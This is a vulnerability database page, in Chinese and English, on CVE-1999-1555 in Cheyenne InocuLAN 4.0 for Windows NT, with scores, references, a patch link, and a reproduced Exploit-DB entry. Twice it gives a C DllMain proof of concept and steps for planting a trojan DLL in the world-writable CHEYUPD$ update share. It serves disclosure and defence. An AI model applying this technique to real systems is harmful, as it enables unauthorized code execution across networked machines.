CVE-1999-1555
CVSS7.2
发布时间 :1998-06-11 00:00:00
修订时间 :2016-11-28 14:06:06
NMCOES    

[原文]Cheyenne InocuLAN Anti-Virus Server in Inoculan 4.0 before Service Pack 2 creates an update directory with "EVERYONE FULL CONTROL" permissions, which allows local users to cause Inoculan's antivirus update feature to install a Trojan horse dll.


[CNNVD]Cheyenne InocuLAN Windows NT Share漏洞(CNNVD-199806-012)

        用于Inoculan 4.0版本的Cheyenne InocuLAN Anti-Virus Server Service Pack 2之前的版本创建一个具有"EVERYONE FULL CONTROL"许可权限的更新目录,本地用户利用该漏洞导致Inoculan的防病毒更新功能去安装Trojan木马DLL文件。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1555
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1555
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199806-012
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/9515
(VENDOR_ADVISORY)  BUGTRAQ  19980611 Cheyenne Inoculan vulnerability on NT
http://www.securityfocus.com/bid/106
(UNKNOWN)  BID  106
http://xforce.iss.net/static/1536.php
(VENDOR_ADVISORY)  XF  inoculan-bad-permissions(1536)

- 漏洞信息

Cheyenne InocuLAN Windows NT Share漏洞
高危 未知
1998-06-11 00:00:00 2005-10-20 00:00:00
远程  
        用于Inoculan 4.0版本的Cheyenne InocuLAN Anti-Virus Server Service Pack 2之前的版本创建一个具有"EVERYONE FULL CONTROL"许可权限的更新目录,本地用户利用该漏洞导致Inoculan的防病毒更新功能去安装Trojan木马DLL文件。

- 公告与补丁

        Go to
        http://www.cheyenne.com/CheyTech/Download/patches/techptch.html and
        install their latest patch.

- 漏洞信息 (19083)

Cheyenne Inoculan for Windows NT 4.0 Share Vulnerability (EDBID:19083)
windows remote
1998-06-10 Verified
0 Paul Boyer
N/A [点击下载]
source: http://www.securityfocus.com/bid/106/info

It is possible to run arbitrary code on any Intel machine running Cheyenne Inoculan version 4.0 for Windows NT prior to SP2. 

Inoculan runs as a service, called "Cheyenne InocuLAN Anti-Virus Server". 
When it starts, it replaces any shared directory with the same name and shares "CHEYUPD$" with full control for the everyone group.

When the service starts, it does an update check in this directory (usually "C:\Inoculan\Update\" ) using the files "<NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt" and [idem]...\avh32dll.dll

Simply "touching" or modifying the file "filelist.txt" to look younger than real causes the update. Th update causes the service to stop, the avh32dll.dll DLL to replace the existing one (usually in 
c:\inoculan\avh32dll.dll) and then starts the service again.
When the service starts, it loads the DLL into memory, and THEN does a lot of 
stuff (including checking if it is a valid DLL, I presume).

You can write a DLL that executes arbitrary code at the time it 
is loaded in memory, at the precise time when DllMain is called by the image loader, before any other function have a chance to be called.

To check if you are vulnerable, if you have the resource kit installed, run 

SRVCHECK.EXE \\<YourMachine>

else run srvmgr.exe from a NT server on the same domain, select <YourMachine> and select "Computer|Shared Directories".

If there is a shared directory called "CHEYUPD$" that allows "FULL CONTROL" to the "EVERYONE" group, you are vulnerable.

An interesting point is that Inoculan uses "domains". In one domain, a single server forwards the updates to all machines participating in that "domain" (nothing to do with NT domains). It may be possible to write the trojan DLL to the domain's server CHEYUPD$ shared directory, and have it copy it to all the machines in the domain.

inoctroj.cpp:
-------Cut here -----------
#include "stdio.h"

long __stdcall DllMain (long, unsigned long, void*)
{
// Any code can goes here. This is an exemple
// What it does is simply create a file on C: drive root directory
// and writing "hello world !" inside of it
FILE * demo;

// create a file
demo = fopen ( "C:\\I_can_write_a_file.txt", "w");

// write to the file
char * buf = "hello world ! ";
fwrite ( buf,1, 15, demo);
fclose ( demo );

// This aborts the DLL loading. Anyway, we're done at that time ;))
return 0; 
}

-------Cut here -----------

Compile and link to make the target avh32dll.dll. Write it to 
<NtBox>\CHEYUPD$\English\NtIntel\Ready\, touch 
<NtBox>\CHEYUPD$\English\NtIntel\Ready\filelist.txt to be newer
that it currently is. Wait for the user to stop and restart the InnocuLAN 
server, or for them to reboot.		

- 漏洞信息

13562
Cheyenne InocuLAN Anti-Virus Server update Directory Permission Weakness
Loss of Integrity Patch / RCS, Upgrade
Vendor Verified

- 漏洞描述

- 时间线

1998-06-11 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, CA has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Cheyenne InocuLAN Windows NT Share Vulnerability
Unknown 106
Yes No
1998-06-10 12:00:00 2009-07-11 12:16:00
This vulnerability was found by Paul Boyer <p__boyer@usa.net> and reported to the BugTraq mailing list.

- 受影响的程序版本

Cheyenne Inoculan for Windows NT 4.0

- 漏洞讨论

It is possible to run arbitrary code on any Intel machine running Cheyenne
Inoculan version 4.0 for Windows NT prior to SP2.

Inoculan runs as a service, called "Cheyenne InocuLAN Anti-Virus Server".
When it starts, it replaces any shared directory with the same name and shares
"CHEYUPD$" with full control for the everyone group.

When the service starts, it does an update check in this directory (usually
"C:\Inoculan\Update\" ) using the files
"&lt;NtBox&gt;\CHEYUPD$\English\NtIntel\Ready\filelist.txt" and
[idem]...\avh32dll.dll

Simply "touching" or modifying the file "filelist.txt" to look younger
than real causes the update. Th update causes the service to stop, the
avh32dll.dll DLL to replace the existing one (usually in
c:\inoculan\avh32dll.dll) and then starts the service again.
When the service starts, it loads the DLL into memory, and THEN does a lot of
stuff (including checking if it is a valid DLL, I presume).

You can write a DLL that executes arbitrary code at the time it
is loaded in memory, at the precise time when DllMain is called by the image
loader, before any other function have a chance to be called.

To check if you are vulnerable, if you have the resource kit installed, run

SRVCHECK.EXE \\&lt;YourMachine&gt;

else run srvmgr.exe from a NT server on the same domain, select &lt;YourMachine&gt;
and select "Computer|Shared Directories".

If there is a shared directory called "CHEYUPD$" that allows "FULL CONTROL" to
the "EVERYONE" group, you are vulnerable.

An interesting point is that Inoculan uses "domains". In one domain, a single
server forwards the updates to all machines participating in that "domain"
(nothing to do with NT domains). It may be possible to write the trojan
DLL to the domain's server CHEYUPD$ shared directory, and have it copy
it to all the machines in the domain.

- 漏洞利用

inoctroj.cpp:
-------Cut here -----------
#include "stdio.h"

long __stdcall DllMain (long, unsigned long, void*)
{
// Any code can goes here. This is an exemple
// What it does is simply create a file on C: drive root directory
// and writing "hello world !" inside of it
FILE * demo;

// create a file
demo = fopen ( "C:\\I_can_write_a_file.txt", "w");

// write to the file
char * buf = "hello world ! ";
fwrite ( buf,1, 15, demo);
fclose ( demo );

// This aborts the DLL loading. Anyway, we're done at that time ;))
return 0;
}

-------Cut here -----------

Compile and link to make the target avh32dll.dll. Write it to
&lt;NtBox&gt;\CHEYUPD$\English\NtIntel\Ready\, touch
&lt;NtBox&gt;\CHEYUPD$\English\NtIntel\Ready\filelist.txt to be newer
that it currently is. Wait for the user to stop and restart the InnocuLAN
server, or for them to reboot.

- 解决方案

Go to http://www.cheyenne.com/CheyTech/Download/patches/techptch.html and
install their latest patch.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站